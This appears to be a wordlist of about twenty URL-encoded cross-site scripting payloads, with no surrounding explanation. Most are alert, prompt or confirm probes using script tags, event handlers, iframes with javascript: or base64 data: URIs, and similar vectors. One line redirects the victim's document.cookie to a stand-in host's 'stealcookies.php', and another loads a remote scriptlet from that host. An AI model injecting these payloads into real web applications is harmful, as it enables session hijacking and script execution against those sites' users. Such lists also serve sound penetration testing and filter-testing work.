%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(%22XSS%22)%20%2F%3E
%3Csvg%2Fonload%3Dprompt(1)%3E
%3Cbody%20onload%3Dalert(%22XSS%22)%3E
%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(%22XSS%22)%3E
%3Csvg%20onload%3Dalert(%22XSS%22)%3E
%3Cbody%20onload%3Dalert(%22XSS%22)%3E
%3Cscript%3Eprompt(%22XSS%22)%3C%2Fscript%3E
%3Cscript%3Econfirm(%22XSS%22)%3C%2Fscript%3E
%3Cimg%20src%3D%22x%22%20onerror%3D%22javascript%3Aalert(%27XSS%27)%22%3E
%3Cscript%3Edocument.location%3D%22xss.example.com%2Fstealcookies.php%3Fc%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E
%3Cobject%20type%3D%22text%2Fx-scriptlet%22%20data%3D%22http%3A%2F%2Fxss.example.com%2Fxss.html%22%3E%3C%2Fobject%3E
%3Ciframe%20src%3D%22javascript%3Aalert(%27XSS%27)%3B%22%3E%3C%2Fiframe%3E
%3Ciframe%20src%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4%3D%22%3E%3C%2Fiframe%3E
%3Cmarquee%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E%3C%2Fmarquee%3E
%3Cscript%3Edocument.write(%27%3Cimg%20src%3D%22x%22%20onerror%3D%22javascript%3Aalert(%5C%27XSS%5C%27)%22%3E%27)%3C%2Fscript%3E
%3Ca%20href%3D%22javascript%3Aprompt(%27XSS%27)%22%3Eclick%20me%3C%2Fa%3E
%3Cimg%20src%3Dx%20onerror%3Dthis.onerror%3Dconfirm(1)%3E
%3Cimg%20src%3D%22x%3Aexpression(alert(1))%22%3E
